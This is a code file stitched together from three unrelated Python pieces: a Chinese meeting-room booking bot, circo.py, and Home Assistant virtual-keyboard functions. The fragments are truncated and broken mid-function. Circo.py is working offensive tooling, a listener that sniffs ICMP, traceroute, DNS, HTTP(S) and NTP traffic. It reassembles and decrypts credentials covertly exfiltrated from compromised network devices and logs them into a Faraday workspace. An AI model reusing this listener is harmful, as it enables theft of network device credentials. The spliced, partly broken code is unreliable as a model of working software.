    # fallback); collapsed into one.
    minutes = int(s)
    if minutes < 15:
        return '00'
    if minutes < 30:
        return '15'
    if minutes < 45:
        return '30'
    return '45'
def shijian_round2(s):
    """Round an end time UP to the next quarter hour, e.g. '9:50' -> '10:00'.

    :param s: time string 'H:MM'
    :return: rounded time string; exact quarter hours pass through unchanged
    """
    minutes = int(s[-2:])
    hour = s[:s.find(':')]
    if minutes > 45:
        return str(int(hour) + 1) + ':00'
    if minutes > 30:
        return hour + ':45'
    if minutes > 15:
        return hour + ':30'
    if minutes > 0:
        return hour + ':15'
    return s
def find_yuding(dialog):
    """Return True for a booking, False for a cancellation ('取消')."""
    return "取消" not in dialog
def find_riqi(dialog):
    """Extract a date from the dialog and return it as 'YYYY-MM-DD'.

    Recognized forms, in priority order:
      'M月D日' / 'M.D'  -> current year + given month/day
      'D号' / 'D日'     -> current year-month + given day
      今 / 明 / 后      -> today / tomorrow / the day after
    Defaults to today.

    Idiom fixes vs. the original: str() instead of __str__(), `in` instead
    of `-1 < find()`, zfill() instead of manual zero padding.
    """
    today = datetime.date.today()
    match = re.findall(r'([12]?[0-9])[月.]([0-3]?[0-9])[日号]?', dialog)  # 12月02日, 10.3
    if len(match) == 1:
        month = match[0][0].zfill(2)
        day = match[0][1].zfill(2)
        return str(today)[:5] + month + '-' + day  # e.g. 2018-12-02
    match = re.findall(r'([0-3]?[0-9])[日号]', dialog)  # 2号
    if len(match) == 1:
        return str(today)[:8] + match[0].zfill(2)
    if "今" in dialog:
        return str(today)
    if "明" in dialog:
        return str(today + datetime.timedelta(days=1))
    if "后" in dialog:
        return str(today + datetime.timedelta(days=2))
    return str(today)
def get_excel_row(sheet, today):
    """Return the row index holding *today*'s bare date (no time).

    When the date row does not exist yet it is appended after the current
    last row. In both cases the quarter-hour time labels below the date row
    are (re)written.

    :param sheet: worksheet to search
    :param today: date string, e.g. str(datetime.date.today())
    :return: row number of the date-only row
    """
    for row in range(1, sheet.max_row + 1):
        if sheet.cell(row=row, column=1).value == today:
            writetime(sheet=sheet, startrow=row + 1)
            return row
    new_row = sheet.max_row + 1
    sheet.cell(row=new_row, column=1).value = today
    writetime(sheet=sheet, startrow=new_row + 1)
    return new_row
def writetime(sheet, startrow):
    """Write quarter-hour labels '8:00:00'..'20:45:00' into column 1.

    The date row itself is not touched; labels begin at *startrow*.
    """
    row = startrow
    for hour in range(8, 21):
        for minute in ("00", "15", "30", "45"):
            sheet.cell(row=row, column=1).value = "{}:{}:00".format(hour, minute)
            row += 1
def get_dtime(st, et):
    """Convert a time range into 15-minute slot offsets from 8:00.

    8:00 occupies the first slot, so a start time's row is the date row
    plus the returned offset.

    :param st: start time, e.g. '8:00'
    :param et: end time, e.g. '9:30'
    :return: (start_offset, end_offset)
    """
    def slot(t):
        hour, _, minute = t.partition(":")
        return (int(hour) - 8) * 4 + int(minute) // 15 + 1

    return slot(st), slot(et)
def get_excel_file(filename):
    """Open *filename* as a workbook, creating an empty file first if needed.

    :param filename: file name with extension, relative to the current directory
    :return: an open openpyxl workbook object
    """
    if filename not in os.listdir(os.getcwd()):
        # no such file yet: create and persist an empty workbook
        new_wb = Workbook()
        new_wb.save(filename)
    return load_workbook(filename)
def get_excel_sheet(riqi, file):
    """Return the sheet for the month of *riqi*, creating it when missing.

    :param riqi: date string; the sheet name is its first 7 chars ('YYYY-MM')
    :param file: open workbook object
    """
    month_name = riqi[:7]
    if month_name not in file.get_sheet_names():
        return create_sheet(month_name, file)
    return file.get_sheet_by_name(name=month_name)
def create_sheet(sheetname, file):
    """Create a sheet named *sheetname* and pre-fill its fixed layout.

    Layout: A1 holds the creation date, column 1 the quarter-hour time
    labels, and row 1 (from column 2 on) the meeting-room names.
    An already-existing sheet is returned untouched.

    :param sheetname: sheet name string
    :param file: open workbook object
    :return: the sheet object
    """
    if sheetname in file.get_sheet_names():
        return file.get_sheet_by_name(sheetname)
    file.create_sheet(sheetname)
    sheet = file.get_sheet_by_name(sheetname)
    sheet.cell(row=1, column=1).value = str(datetime.date.today())
    writetime(sheet=sheet, startrow=2)
    for offset, room in enumerate(get_meetingrooms_names()):
        sheet.cell(row=1, column=offset + 2).value = room
    return sheet
def deal_book(sheet, start, end, column, info, book, bot, contact, member):
    """Apply a booking (book=True) or cancellation to the sheet and reply.

    Booking fails when any slot in [start, end) is already occupied;
    cancellation always clears the range.
    """
    if not book:
        # cancellation path: clear the range unconditionally
        unoccupy_it(sheet, start, end, column)
        bot.SendTo(contact, '机器人回复 ' + str(info[:info.find(' 群"')]) + "取消成功")
    else:
        busy, busy_info = is_occupied(sheet, start, end, column)
        if busy:
            bot.SendTo(contact, "机器人回复 失败,因为\"" + busy_info + "\"占用")
        else:
            occupy_it(sheet, start, end, column, info)
            bot.SendTo(contact, "机器人回复 成功\n" + " 记录的信息: " + member.name + " " + info[-32:])
    print('\n')
def is_occupied(sheet, start, end, column):
    """Check whether any slot row in [start, end) of *column* holds an entry.

    :return: (occupied, info) - info is the first occupying entry, '' if free
    """
    for row in range(start, end):
        existing = sheet.cell(row=row, column=column).value
        if existing is not None:
            return True, existing
    return False, ""
def occupy_it(sheet, st, en, co, info="占用人信息"):
    """Fill every slot row in [st, en) of column *co* with *info*."""
    for row in range(st, en):
        sheet.cell(column=co, row=row).value = info
def unoccupy_it(sheet, st, en, co):
    """Clear every slot row in [st, en) of column *co*."""
    for row in range(st, en):
        sheet.cell(column=co, row=row).value = None
def excel_file_close(file, name):
    """Persist the workbook to *name*; openpyxl only writes on save()."""
    file.save(name)
def _test_dialog_clearify():
    """Self-test for dialog_clearify(): (raw, expected) pairs."""
    cases = [
        ('预定4月2日和昌12楼小会议室5:30-6:00', '预定4月2日和昌12层小会议室17:30-18:00'),
        ('预定4月2日和昌12楼小会议室2:30-6:00', '预定4月2日和昌12层小会议室14:30-18:00'),
        ('预定4月3日和昌12楼大会议室9:00-11:00', '预定4月3日和昌12层大会议室9:00-11:00'),
        ('预定4月2日上午和昌12楼小会议室,9:00--11:30', '预定4月2日上午和昌12层小会议室.9:00-11:30'),
        ('预定28日(今天)下午12楼大会议室,15:00到16:00', '预定28日(今天)下午12层大会议室.15:00-16:00'),
        ('预定今天全天小会议室', '预定今天8:30-18:00小会议室'),
        ('预定4月2日和昌13楼大会议室11:00-12:00', '预定4月2日和昌13层大会议室11:00-12:00'),
        ('预定27号,下午14点30到17点,和昌12层大会议室', '预定27号.下午14:30-17:00.和昌12层大会议室'),
    ]
    for raw, expected in cases:
        assert dialog_clearify(raw) == expected, '对话语句清理函数dialog_clearify有问题'
def _test_find_fangjian():
    """Self-test for find_fangjian(): (dialog, expected index) pairs."""
    cases = [
        ('预定4月2日和昌12层小会议室17:30-18:00', 0),
        ('预定4月3日和昌12层大会议室9:00-11:00', 1),
        ('预定4月2日和昌13层大会议室11:00-12:00', 2),
        ('预定4月2日和昌13层会议室11:00-12:00', 2),
        ('预定今天8:30-18:00小会议室', 0),
        ('预定今天8:30-18:00老楼会议室', 3),
    ]
    for dialog, expected in cases:
        assert find_fangjian(dialog) == expected, '寻找会议室编号函数find_fangjian有问题'
def _test_find_shijian():
    """Self-test for find_shijian(): (dialog, expected (start, end)) pairs."""
    cases = [
        ('预定4月2日和昌12层小会议室17:30-18:00', ('17:30', '18:00')),
        ('预定4月2日和昌12层小会议室14:30-18:00', ('14:30', '18:00')),
        ('预定28日(今天)下午12层大会议室.15:00-16:00', ('15:00', '16:00')),
        ('预定今天8:30-18:00小会议室', ('8:30', '18:00')),
        ('预定上午大会议室', ('8:30', '12:00')),
        ('订小会议室 9:10-10:30', ('9:00', '10:30')),
    ]
    for dialog, expected in cases:
        assert find_shijian(dialog) == expected, '寻找开始和结束时间函数find_shijian有问题'
def _test_find_riqi():
assert find_riqi('预定4月2日和昌12层小会议室17:30-18:00') == '2018-04-02', '寻找日期函数find_riqi有问题'
assert find_riqi('预定今天8:30-18:00小会议室') == datetime.date.today().__str__(), '寻找日期函数find_riqi有问题'
assert find_riqi('预定30日下午12楼小会议室.14:00-16:00') == '2018-04-30', '寻找日期函数find_riqi有问题'
assert find_riqi('预定27号.下午14:30-17:00.和昌12层大会议室') == '2018-04-27', '寻找日期函数find_riqi有问题'
assert find_riqi('预订12楼大会议室,12点到14点')[:7] == datetime.date.today().__str__()[:7], | |
<reponame>Satcomx00-x00/circo----Cisco
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
circo.py source code
"""
from __future__ import print_function
import sys
import re
import argparse
import time
import threading
import collections
import socket
import ConfigParser
import requests
import pyaes
import pyscrypt
from pyfiglet import Figlet
from scapy.all import Raw, IP, ICMP, TCP, UDP, DNS, sniff
# Me
__author__ = "Emilio / @ekio_jp"
__version__ = "1.5"
# Config
PHRASE = 'Waaaaa! awesome :)'  # scrypt passphrase used to derive the AES key (see decrypt())
SALT = 'salgruesa'  # scrypt salt; must match the encoding side
CCNAME = 'evil.sub.domain'  # C&C domain name matched inside sniffed DNS queries
DEBUG = False  # when True, decoded credentials/alarms are printed to stdout
PLUG = False  # when True, decoded credentials are pushed into Faraday
FSERVER = ''  # Faraday server URL
FUSER = ''  # Faraday user name
FPASSWD = ''  # Faraday password
FWS = ''  # Faraday workspace name
FSESSION = False  # Faraday HTTP session; False until a login happens
# Faraday objects (host & credentials) - templates sent to the Faraday API
HOST = {"ip":"",
        "hostnames":[],
        "mac":"00:00:00:00:00:00",
        "description":"",
        "default_gateway":"None",
        "os":"",
        "owned":"false",
        "owner":""
        }
CREDENTIAL = {"name":"",
              "username":"",
              "password":"",
              "type":"Cred",
              "parent_type":"Host",
              "parent":"",
              "owner":"",
              "description":""
              }
# Classes
class PINGHandler(threading.Thread):
    """
    Class to observe PING packets and decrypt credentials.

    Covert-channel decoding keyed on the IP id field:
      200-299 -> ciphertext length, 300-399 -> expected chunk count,
      500-599 -> data chunk (payload carried in the ICMP seq field),
      666     -> tamper alarm ("case open").
    """
    def __init__(self, iface, fd):
        # iface: interface name to sniff on; fd: output file path
        threading.Thread.__init__(self)
        self.stoprequest = threading.Event()
        self.iface = iface
        self.filed = fd
        self.dic = {}  # chunk index -> 4-hex-digit fragment
        self.pkttotal = 200  # expected chunk count (sentinel until a 3xx id arrives)
        self.pktlen = 0  # ciphertext length in hex chars
    def pkt_callback(self, pkt):
        """
        Process PING packets (echo requests only, ICMP type 8).
        """
        if pkt[ICMP].type == 8:
            if pkt[IP].id >= 200 and pkt[IP].id < 300:
                self.pktlen = pkt[IP].id - 200
            elif pkt[IP].id >= 300 and pkt[IP].id < 400:
                self.pkttotal = pkt[IP].id - 300
            elif pkt[IP].id >= 500 and pkt[IP].id < 600:
                # data fragment: ICMP sequence number rendered as 4 hex digits
                self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[ICMP].seq)
            elif pkt[IP].id == 666:
                if DEBUG:
                    print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                          + 'PING:' + pkt[IP].src + ':ALARM Case Open!')
            if len(self.dic) == self.pkttotal:
                # all chunks received: reassemble in index order and decrypt
                odic = collections.OrderedDict(sorted(self.dic.items()))
                final = ''
                for value in odic.iteritems():  # Python 2 API
                    final = final + value[1]
                text = decrypt(final[:self.pktlen])
                text = text.strip()
                # last comma-separated field is a hex-encoded IP; prettify it
                hexip = text.split(',')[-1]
                text = text.replace(hexip, hextoip(hexip))
                text = 'PING:' + pkt[IP].src + ':' + text
                printer(self.filed, text)
                # reset for the next credential transmission
                self.dic = {}
                self.pkttotal = 200
    def run(self):
        while not self.stoprequest.isSet():
            sniff(iface=self.iface, prn=self.pkt_callback, filter="icmp",
                  store=0)
    def killer(self):
        """
        stop Thread
        """
        self.stoprequest.set()
class TraceHandler(threading.Thread):
    """
    Class to observe UDP packets (portrange 33434-33500, i.e. traceroute)
    and decrypt credentials.

    Same IP-id protocol as PINGHandler (200-299 length, 300-399 count,
    500-599 data, 666 alarm); the data fragment travels in the UDP payload
    after a 28-byte offset.
    """
    def __init__(self, iface, fd):
        # iface: interface name to sniff on; fd: output file path
        threading.Thread.__init__(self)
        self.stoprequest = threading.Event()
        self.iface = iface
        self.filed = fd
        self.dic = {}  # chunk index -> payload fragment
        self.pkttotal = 200  # expected chunk count (sentinel until a 3xx id arrives)
        self.pktlen = 0  # ciphertext length in hex chars
    def pkt_callback(self, pkt):
        """
        Process Traceroute packets
        """
        if pkt[IP].id >= 200 and pkt[IP].id < 300:
            self.pktlen = pkt[IP].id - 200
        elif pkt[IP].id >= 300 and pkt[IP].id < 400:
            self.pkttotal = pkt[IP].id - 300
        elif pkt[IP].id >= 500 and pkt[IP].id < 600:
            # data fragment: raw payload after the 28-byte header padding
            self.dic[pkt[IP].id - 500] = pkt[Raw].load[28:]
        elif pkt[IP].id == 666:
            if DEBUG:
                print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                      + 'TRACE:' + pkt[IP].src + ':ALARM Case Open!')
        if len(self.dic) == self.pkttotal:
            # all chunks received: reassemble in index order and decrypt
            odic = collections.OrderedDict(sorted(self.dic.items()))
            final = ''
            for value in odic.iteritems():  # Python 2 API
                final = final + value[1]
            text = decrypt(final[:self.pktlen])
            text = text.strip()
            # last comma-separated field is a hex-encoded IP; prettify it
            hexip = text.split(',')[-1]
            text = text.replace(hexip, hextoip(hexip))
            text = 'TRACE:' + pkt[IP].src + ':' + text
            printer(self.filed, text)
            self.dic = {}
            self.pkttotal = 200
    def run(self):
        while not self.stoprequest.isSet():
            sniff(iface=self.iface, prn=self.pkt_callback, store=0,
                  filter="(udp and dst portrange 33434-35000) and (not src port 53)")
    def killer(self):
        """
        stop Thread
        """
        self.stoprequest.set()
class DNSHandler(threading.Thread):
    """
    Class to observe DNS packets and decrypt credentials.

    The ciphertext arrives as the leftmost label of a query for the C&C
    domain; a query for '666.<ccname>.' signals the tamper alarm.
    """
    def __init__(self, iface, fd, ccname):
        # iface: interface to sniff on; fd: output file path;
        # ccname: C&C domain that marks our covert queries
        threading.Thread.__init__(self)
        self.stoprequest = threading.Event()
        self.iface = iface
        self.filed = fd
        self.ccname = ccname
    def pkt_callback(self, pkt):
        """
        Proccess DNS packets
        """
        if self.ccname in pkt[DNS].qd.qname:
            if pkt[DNS].qd.qname == '666.' + self.ccname + '.':
                # NOTE(review): unlike the other handlers, this alarm print is
                # not guarded by DEBUG - confirm whether that is intentional.
                print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                      + 'DNS/PDNS:' + pkt[IP].src + ':ALARM Case Open!')
            else:
                # first label of the query name is the whole ciphertext
                text = decrypt(pkt[DNS].qd.qname.split('.')[0])
                text = text.strip()
                # last comma-separated field is a hex-encoded IP; prettify it
                hexip = text.split(',')[-1]
                text = text.replace(hexip, hextoip(hexip))
                if pkt[DNS].qd.qtype == 2:
                    # qtype 2 = NS query -> direct DNS channel
                    text = 'DNS:' + pkt[IP].src + ':' + text
                else:
                    # any other qtype -> passive/recursive DNS channel
                    text = 'PDNS:' + pkt[IP].src + ':' + text
                printer(self.filed, text)
    def run(self):
        while not self.stoprequest.isSet():
            sniff(iface=self.iface, prn=self.pkt_callback, store=0,
                  filter="udp and dst port 53")
    def killer(self):
        """
        stop Thread
        """
        self.stoprequest.set()
class HTTPHandler(threading.Thread):
    """
    Class to observe HTTP packets (TCP port 80) and decrypt credentials.

    Same IP-id protocol as PINGHandler; the data fragment travels in the
    TCP window field.
    """
    def __init__(self, iface, fd):
        # iface: interface name to sniff on; fd: output file path
        threading.Thread.__init__(self)
        self.stoprequest = threading.Event()
        self.iface = iface
        self.filed = fd
        self.dic = {}  # chunk index -> 4-hex-digit fragment
        self.pkttotal = 200  # expected chunk count (sentinel until a 3xx id arrives)
        self.pktlen = 0  # ciphertext length in hex chars
    def pkt_callback(self, pkt):
        """
        Proccess HTTP packets (direct)
        """
        if pkt[IP].id >= 200 and pkt[IP].id < 300:
            self.pktlen = pkt[IP].id - 200
        elif pkt[IP].id >= 300 and pkt[IP].id < 400:
            self.pkttotal = pkt[IP].id - 300
        elif pkt[IP].id >= 500 and pkt[IP].id < 600:
            # data fragment: TCP window rendered as 4 hex digits
            self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[TCP].window)
        elif pkt[IP].id == 666:
            # NOTE(review): not guarded by DEBUG, unlike PING/TRACE - confirm.
            print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                  + 'HTTP:' + pkt[IP].src + ':ALARM Case Open!')
        if len(self.dic) == self.pkttotal:
            # all chunks received: reassemble in index order and decrypt
            odic = collections.OrderedDict(sorted(self.dic.items()))
            final = ''
            for value in odic.iteritems():  # Python 2 API
                final = final + value[1]
            text = decrypt(final[:self.pktlen])
            text = text.strip()
            # last comma-separated field is a hex-encoded IP; prettify it
            hexip = text.split(',')[-1]
            text = text.replace(hexip, hextoip(hexip))
            text = 'HTTP:' + pkt[IP].src + ':' + text
            printer(self.filed, text)
            self.dic = {}
            self.pkttotal = 200
    def run(self):
        while not self.stoprequest.isSet():
            sniff(iface=self.iface, prn=self.pkt_callback, store=0,
                  filter="tcp and dst port 80")
    def killer(self):
        """
        stop Thread
        """
        self.stoprequest.set()
class HTTPSHandler(threading.Thread):
    """
    Class to observe HTTPS packets (TCP port 443) and decrypt credentials.

    Identical to HTTPHandler except for the port filter: the data fragment
    travels in the TCP window field, driven by the IP-id protocol.
    """
    def __init__(self, iface, fd):
        # iface: interface name to sniff on; fd: output file path
        threading.Thread.__init__(self)
        self.stoprequest = threading.Event()
        self.iface = iface
        self.filed = fd
        self.dic = {}  # chunk index -> 4-hex-digit fragment
        self.pkttotal = 200  # expected chunk count (sentinel until a 3xx id arrives)
        self.pktlen = 0  # ciphertext length in hex chars
    def pkt_callback(self, pkt):
        """
        Proccess HTTPS packets
        """
        if pkt[IP].id >= 200 and pkt[IP].id < 300:
            self.pktlen = pkt[IP].id - 200
        elif pkt[IP].id >= 300 and pkt[IP].id < 400:
            self.pkttotal = pkt[IP].id - 300
        elif pkt[IP].id >= 500 and pkt[IP].id < 600:
            # data fragment: TCP window rendered as 4 hex digits
            self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[TCP].window)
        elif pkt[IP].id == 666:
            # NOTE(review): not guarded by DEBUG, unlike PING/TRACE - confirm.
            print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                  + 'HTTPS:' + pkt[IP].src + ':ALARM Case Open!')
        if len(self.dic) == self.pkttotal:
            # all chunks received: reassemble in index order and decrypt
            odic = collections.OrderedDict(sorted(self.dic.items()))
            final = ''
            for value in odic.iteritems():  # Python 2 API
                final = final + value[1]
            text = decrypt(final[:self.pktlen])
            text = text.strip()
            # last comma-separated field is a hex-encoded IP; prettify it
            hexip = text.split(',')[-1]
            text = text.replace(hexip, hextoip(hexip))
            text = 'HTTPS:' + pkt[IP].src + ':' + text
            printer(self.filed, text)
            self.dic = {}
            self.pkttotal = 200
    def run(self):
        while not self.stoprequest.isSet():
            sniff(iface=self.iface, prn=self.pkt_callback, store=0,
                  filter="tcp and dst port 443")
    def killer(self):
        """
        stop Thread
        """
        self.stoprequest.set()
class NTPHandler(threading.Thread):
    """
    Class to observe NTP packets and decrypt credentials.

    Unlike the sniffing handlers this one binds a real UDP socket on port
    123 and parses the trailing 48 bytes (NTP packet size) of each datagram.
    Marker byte (hex offset 2:4): '10' header (count+length), '00' data
    chunk, '99' tamper alarm.
    """
    def __init__(self, iface, fd):
        # iface is accepted for interface-parity with the other handlers but
        # not used; fd: output file path
        threading.Thread.__init__(self)
        self.stoprequest = threading.Event()
        self.iface = iface
        self.filed = fd
        self.dic = {}  # chunk index -> 8-hex-digit fragment
        self.pkttotal = 200  # expected chunk count (sentinel until header arrives)
        self.pktlen = 0  # ciphertext length in hex chars
        self.ssocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.ssocket.bind(('0.0.0.0', 123))
    def run(self):
        while not self.stoprequest.isSet():
            buf, address = self.ssocket.recvfrom(200)
            if buf:
                buflen = len(buf)
                # keep only the final 48 bytes and work on its hex encoding
                full = buf[buflen-48:buflen].encode('hex')  # Python 2 API
                if full[2:4] == '10':
                    # header: chunk count then ciphertext length
                    self.pkttotal = int(full[4:6], 16)
                    self.pktlen = int(full[6:8], 16)
                elif full[2:4] == '00':
                    # data chunk: index at [4:6], payload hex at [88:96]
                    self.dic[int(full[4:6], 16)] = full[88:96]
                elif full[2:4] == '99':
                    # NOTE(review): not guarded by DEBUG, unlike PING/TRACE.
                    print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                          + 'NTP:' + address[0] + ':ALARM Case Open!')
                if len(self.dic) == self.pkttotal:
                    # all chunks received: reassemble in index order, decrypt
                    odic = collections.OrderedDict(sorted(self.dic.items()))
                    final = ''
                    for value in odic.iteritems():  # Python 2 API
                        final = final + value[1]
                    text = decrypt(final[:self.pktlen])
                    text = text.strip()
                    # last comma-separated field is a hex-encoded IP
                    hexip = text.split(',')[-1]
                    text = text.replace(hexip, hextoip(hexip))
                    text = 'NTP:' + address[0] + ':' + text
                    printer(self.filed, text)
                    self.dic = {}
                    self.pkttotal = 200
                    self.pktlen = 0
                    buf = ''
    def killer(self):
        """
        stop Thread
        """
        self.stoprequest.set()
# Define Funtions
def decrypt(ciphertxt):
    """Decrypt a hex-encoded AES-CTR ciphertext string.

    The AES key is derived from PHRASE/SALT via scrypt (N=1024, r=1, p=1,
    16 bytes) and hex-encoded before use, matching the sender side.
    NOTE(review): relies on Python 2's str.encode('hex')/.decode('hex');
    this will not run unmodified on Python 3.
    """
    hashed = pyscrypt.hash(PHRASE, SALT, 1024, 1, 1, 16)
    key = hashed.encode('hex')
    aes = pyaes.AESModeOfOperationCTR(key)
    cleartxt = aes.decrypt(ciphertxt.decode('hex'))
    return cleartxt
def hextoip(ipadd):
    """Convert a hex-encoded IPv4 address ('c0a80101') to dotted-quad form."""
    octets = [ipadd[i:i + 2] for i in range(0, len(ipadd), 2)]
    return '.'.join(str(int(octet, 16)) for octet in octets)
def printer(filed, text):
    """Append *text* (timestamped) to the output file, deduplicated, and
    optionally forward it to Faraday.

    :param filed: path of the credentials log file
    :param text: decoded credential line, e.g. 'PING:1.2.3.4:t,user,pw,ip'
    """
    if DEBUG:
        print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime()) + text)
    # Fix: escape the credential text before embedding it in the dedup
    # regex. Credentials may contain metacharacters ('(', '+', '[', ...)
    # which previously could raise re.error or silently mis-match.
    find = re.compile('\\b' + re.escape(text) + '\\b')
    with open(filed, 'a+') as sfile:
        with open(filed, 'r') as xfile:
            match = find.findall(xfile.read())
            if not match:
                sfile.write(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
                            + text + '\n')
                if PLUG:
                    faraday(text)
def faraday(txt):
"""
Push credentials into Faraday Workspace
"""
global FSESSION
srcip = txt.split(',')[-1:][0]
natip = txt.split(':')[1]
name = txt.split(':')[2].split(',')[0]
if name == 't' or name == 's':
username = txt.split(':')[2].split(',')[1]
name = name.replace('t', 'telnet').replace('s', 'ssh')
if username == 'e':
username = 'enable'
password = txt.split(':')[2].split(',')[2]
else:
name = name.replace('p', 'snmp')
username = 'N/A'
password = txt.split(':')[2].split(',')[1]
resp = FSESSION.get(FSERVER + '/_api/v2/ws/' + FWS + '/credential/')
if resp.status_code == 401:
FSESSION = flogin()
resp = FSESSION.get(FSERVER + '/_api/v2/ws/' + FWS + '/credential/')
if resp.status_code == 200:
credata = resp.json()
exist = False
for credrow in range(len(credata['rows'])):
_target = credata['rows'][credrow]['value']['target']
_name = credata['rows'][credrow]['value']['name']
_user = credata['rows'][credrow]['value']['username']
_pass = credata['rows'][credrow]['value']['password']
if _target == srcip and name == _name and username == _user and password == _pass:
exist = True
break
if not exist:
parent_id = checkhost(FSERVER, | |
focus on current menu group view
global CURR_GROUP_VIEW
global CURR_GROUP
global CURR_ENTITIE
global CURR_ENTITIE_ENTERED
global CURR_ENTITIE_POSITION
CURR_GROUP = None
CURR_ENTITIE = None
CURR_ENTITIE_ENTERED = False
CURR_ENTITIE_POSITION = None
CURR_GROUP_VIEW = get_curr_group_view()
def set_next_group_view():
    """Advance menu focus to the next group view."""
    global CURR_GROUP_VIEW
    current_view = get_curr_group_view()
    CURR_GROUP_VIEW = get_next(GROUP_VIEWS, current_view)
    # re-enter the view so group/entity selection state is reset
    set_curr_group_view()
def set_prev_group_view():
    """Move menu focus back to the previous group view."""
    global CURR_GROUP_VIEW
    current_view = get_curr_group_view()
    CURR_GROUP_VIEW = get_prev(GROUP_VIEWS, current_view)
    # re-enter the view so group/entity selection state is reset
    set_curr_group_view()
# virtual keyboard
# Group views: Litery -> Wielkie litery -> Cyfry -> Znaki specjalne -> Usuwanie
def get_curr_virtual_keyboard_mode():
    """Return the active keyboard mode, defaulting to the first mode."""
    if CURR_VIRTUAL_KEYBOARD_MODE is not None:
        return CURR_VIRTUAL_KEYBOARD_MODE
    return VIRTUAL_KEYBOARD_MODE[0]
def set_next_virtual_keyboard_mode():
    """Switch to the next keyboard mode, dropping the key selection."""
    global CURR_VIRTUAL_KEYBOARD_MODE
    global CURR_VIRTUAL_KEY
    CURR_VIRTUAL_KEY = None  # key focus is mode-specific
    current_mode = get_curr_virtual_keyboard_mode()
    CURR_VIRTUAL_KEYBOARD_MODE = get_next(VIRTUAL_KEYBOARD_MODE, current_mode)
def set_prev_virtual_keyboard_mode():
    """Switch to the previous keyboard mode, dropping the key selection."""
    global CURR_VIRTUAL_KEYBOARD_MODE
    global CURR_VIRTUAL_KEY
    CURR_VIRTUAL_KEY = None  # key focus is mode-specific
    current_mode = get_curr_virtual_keyboard_mode()
    CURR_VIRTUAL_KEYBOARD_MODE = get_prev(VIRTUAL_KEYBOARD_MODE, current_mode)
def say_curr_virtual_keyboard_mode(hass):
    """Read the active keyboard mode name aloud."""
    mode = get_curr_virtual_keyboard_mode()
    _say_it(hass, mode)
def get_curr_virtual_key():
    """Return the focused key, defaulting to the first key of the active mode."""
    if CURR_VIRTUAL_KEY is not None:
        return str(CURR_VIRTUAL_KEY)
    keys_by_mode = {
        "Litery": VIRTUAL_KEYBOARD_LETTERS,
        "Wielkie litery": VIRTUAL_KEYBOARD_LETTERS,
        "Cyfry": VIRTUAL_KEYBOARD_NUMBERS,
        "Znaki specjalne": VIRTUAL_KEYBOARD_SYMBOLS,
        "Usuwanie": VIRTUAL_KEYBOARD_DELETE,
    }
    keys = keys_by_mode.get(get_curr_virtual_keyboard_mode())
    if keys is not None:
        return keys[0]
    # unknown mode: fall through to None, like the original if/elif chain
def set_next_virtual_key():
    """Move key focus forward within the active keyboard mode."""
    global CURR_VIRTUAL_KEY
    keys_by_mode = {
        "Litery": VIRTUAL_KEYBOARD_LETTERS,
        "Wielkie litery": VIRTUAL_KEYBOARD_LETTERS,
        "Cyfry": VIRTUAL_KEYBOARD_NUMBERS,
        "Znaki specjalne": VIRTUAL_KEYBOARD_SYMBOLS,
        "Usuwanie": VIRTUAL_KEYBOARD_DELETE,
    }
    keys = keys_by_mode.get(get_curr_virtual_keyboard_mode())
    if keys is not None:
        CURR_VIRTUAL_KEY = get_next(keys, get_curr_virtual_key())
def set_prev_virtual_key():
    """Move key focus backward within the active keyboard mode."""
    global CURR_VIRTUAL_KEY
    keys_by_mode = {
        "Litery": VIRTUAL_KEYBOARD_LETTERS,
        "Wielkie litery": VIRTUAL_KEYBOARD_LETTERS,
        "Cyfry": VIRTUAL_KEYBOARD_NUMBERS,
        "Znaki specjalne": VIRTUAL_KEYBOARD_SYMBOLS,
        "Usuwanie": VIRTUAL_KEYBOARD_DELETE,
    }
    keys = keys_by_mode.get(get_curr_virtual_keyboard_mode())
    if keys is not None:
        CURR_VIRTUAL_KEY = get_prev(keys, get_curr_virtual_key())
def say_curr_virtual_key(hass):
    """Read the focused key aloud; symbols are spoken by their names."""
    key = get_curr_virtual_key()
    mode = get_curr_virtual_keyboard_mode()
    if mode == "Litery":
        text = key.lower()
    elif mode == "Znaki specjalne":
        # speak the symbol's name, not the raw character
        idx = VIRTUAL_KEYBOARD_SYMBOLS.index(key)
        text = VIRTUAL_KEYBOARD_SYMBOLS_NAMES[idx]
    elif mode in ("Wielkie litery", "Cyfry", "Usuwanie"):
        text = key
    else:
        text = ""
    _say_it(hass, text)
def reset_virtual_keyboard(hass):
    """Clear keyboard mode/key/value state and blank the edited input_text."""
    global CURR_VIRTUAL_KEYBOARD_MODE
    global CURR_VIRTUAL_KEY
    global CURR_VIRTUAL_KEYBOARD_VALUE
    CURR_VIRTUAL_KEYBOARD_MODE = CURR_VIRTUAL_KEY = CURR_VIRTUAL_KEYBOARD_VALUE = None
    # wipe the value of the entity currently being edited
    hass.services.call(
        "input_text", "set_value", {"entity_id": CURR_ENTITIE, "value": ""}
    )
def get_hour_to_say(h, m):
    """Build the Polish 'godzina: <HH:MM>' phrase for the given hour/minute."""
    from datetime import time
    import babel.dates
    spoken = babel.dates.format_time(time(h, m), format="short", locale="pl")
    return "godzina: " + spoken
def set_time_hour_up(hass, entity_id):
    """Increase the edited hour by one (23 wraps to 0) and announce it."""
    global G_INPUT_CURRENT_HOUR
    global G_INPUT_CURRENT_MINNUTE
    if G_INPUT_CURRENT_HOUR is None:
        # first key press: seed the edit buffer from the entity's attributes
        time_attr = hass.states.get(entity_id).attributes
        G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
        G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
    G_INPUT_CURRENT_HOUR = 0 if G_INPUT_CURRENT_HOUR == 23 else G_INPUT_CURRENT_HOUR + 1
    _say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def set_time_hour_down(hass, entity_id):
